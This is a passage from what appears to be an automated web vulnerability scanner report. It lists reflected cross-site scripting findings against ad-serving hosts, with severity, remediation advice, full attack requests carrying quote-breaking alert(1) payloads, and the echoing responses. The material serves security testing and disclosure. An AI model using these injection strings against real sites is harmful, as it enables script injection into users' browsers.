Referer: http://tag.admeld.com/imp/iframe/100/glammedia/300x250/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/6636144a-d522-413b-b4d7-acc91ac5c583?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349057
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Apr 2011 01:31:21 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338fcc4f'-alert(1)-'60ec268c148&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');


3.478. http://um.simpli.fi/am_js.js [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_js.js

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 504c5'-alert(1)-'848a84ab707 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_js.js?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match504c5'-alert(1)-'848a84ab707 HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/300x250/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/6636144a-d522-413b-b4d7-acc91ac5c583?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349057
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Apr 2011 01:31:21 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match504c5'-alert(1)-'848a84ab707?admeld_adprovider_id=338&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');


3.479. http://um.simpli.fi/am_match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c5d9'-alert(1)-'c693518a79b was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=3387c5d9'-alert(1)-'c693518a79b&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/300x250/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/6636144a-d522-413b-b4d7-acc91ac5c583?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349057
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Apr 2011 01:31:13 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=3387c5d9'-alert(1)-'c693518a79b&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');


3.480. http://um.simpli.fi/am_match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b9c8'-alert(1)-'6080a1b3f83 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match8b9c8'-alert(1)-'6080a1b3f83 HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/300x250/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/6636144a-d522-413b-b4d7-acc91ac5c583?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349057
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Apr 2011 01:31:13 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match8b9c8'-alert(1)-'6080a1b3f83?admeld_adprovider_id=338&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');


3.481. http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_redirect_js

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d48e9'-alert(1)-'8fc60c96206 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_redirect_js?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=338d48e9'-alert(1)-'8fc60c96206&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/300x250/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/6636144a-d522-413b-b4d7-acc91ac5c583?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349057
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Apr 2011 01:31:15 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338d48e9'-alert(1)-'8fc60c96206&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');


3.482. http://um.simpli.fi/am_redirect_js [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_redirect_js

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53444'-alert(1)-'085db14bc75 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_redirect_js?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match53444'-alert(1)-'085db14bc75 HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/300x250/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/6636144a-d522-413b-b4d7-acc91ac5c583?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349057
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Apr 2011 01:31:15 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match53444'-alert(1)-'085db14bc75?admeld_adprovider_id=338&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');


3.483. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1407'%3balert(1)//6b06bfedd3b was submitted in the REST URL parameter 2. This input was echoed as d1407';alert(1)//6b06bfedd3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AFTRSERVER/hserverd1407'%3balert(1)//6b06bfedd3b//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:17 GMT
X-DirectServer: viacom_DS21
Content-Type: text/html
Content-Length: 2332
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AA002=1303072666-9018543; expires=Fri, 22 Apr 2011 20:02:17 GMT; path=/; domain=viacom.adbureau.net
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
tempStr = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000d1407';alert(1)//6b06bfedd3b//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent
...[SNIP]...

3.484. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52531'%3balert(1)//e133daf0ee1 was submitted in the REST URL parameter 3. This input was echoed as 52531';alert(1)//e133daf0ee1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AFTRSERVER/hserver//height52531'%3balert(1)//e133daf0ee1=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:17 GMT
X-DirectServer: viacom_DS25
Content-Type: text/html
Content-Length: 2332
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AA002=1303072666-9018543; expires=Fri, 22 Apr 2011 20:02:17 GMT; path=/; domain=viacom.adbureau.net
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
tr = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000//height52531';alert(1)//e133daf0ee1=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload
...[SNIP]...

3.485. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f655b'%3balert(1)//9025d8e1577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f655b';alert(1)//9025d8e1577 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543?f655b'%3balert(1)//9025d8e1577=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:17 GMT
X-DirectServer: viacom_DS17
Content-Type: text/html
Content-Length: 2335
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AA002=1303072666-9018543?f655b'%3balert(1); expires=Fri, 22 Apr 2011 20:02:17 GMT; path=/; domain=viacom.adbureau.net
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543?f655b';alert(1)//9025d8e1577=1&relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5292';


/* Try to get the width and height from AAMLib first */
/
...[SNIP]...

3.486. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b4dd'%3balert(1)//9cd18a86ff4 was submitted in the REST URL parameter 1. This input was echoed as 8b4dd';alert(1)//9cd18a86ff4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver8b4dd'%3balert(1)//9cd18a86ff4/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4; AA002=1303072666-9018543

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:06:02 GMT
X-DirectServer: viacom_DS22
Content-Type: text/html
Content-Length: 2310
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5235,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
tempStr = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=0000147300000000000000008b4dd';alert(1)//9cd18a86ff4/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5235';



...[SNIP]...

3.487. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6779'%3balert(1)//985a6732d77 was submitted in the REST URL parameter 2. This input was echoed as e6779';alert(1)//985a6732d77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/heighte6779'%3balert(1)//985a6732d77=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4; AA002=1303072666-9018543

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:06:02 GMT
X-DirectServer: viacom_DS22
Content-Type: text/html
Content-Length: 9999
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload1027,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
equiredVersion);\r\n}\r\n}\r\n}\r\ndetectPluginTFR1301674168897();\r\nvar _TFR1301674168897_Instance =\r\n{\r\nclick : \"http://viacom.adbureau.net/accipiter/adclick/CID=000004030000000000000000/heighte6779';alert(1)//985a6732d77=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1/relocate=\",\r\nclickThruUrl: \"http://clk.atdmt.com/go/mtvnsdrv0010001160apm/direct;wi.300;hi.250;ai.204747641.208196969;ct.$num$/01/\",\r
...[SNIP]...

3.488. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56888'%3balert(1)//4857672fae1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56888';alert(1)//4857672fae1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1?56888'%3balert(1)//4857672fae1=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4; AA002=1303072666-9018543

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:06:02 GMT
X-DirectServer: viacom_DS24
Content-Type: text/html
Content-Length: 2858
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload1027,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
empStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000004030000000000000000/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1?56888';alert(1)//4857672fae1=1&relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload1027';


/* Try to get the width and height from AAMLib first */
/
...[SNIP]...

3.489. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10202'%3balert(1)//4440355789c was submitted in the REST URL parameter 1. This input was echoed as 10202';alert(1)//4440355789c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver10202'%3balert(1)//4440355789c/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
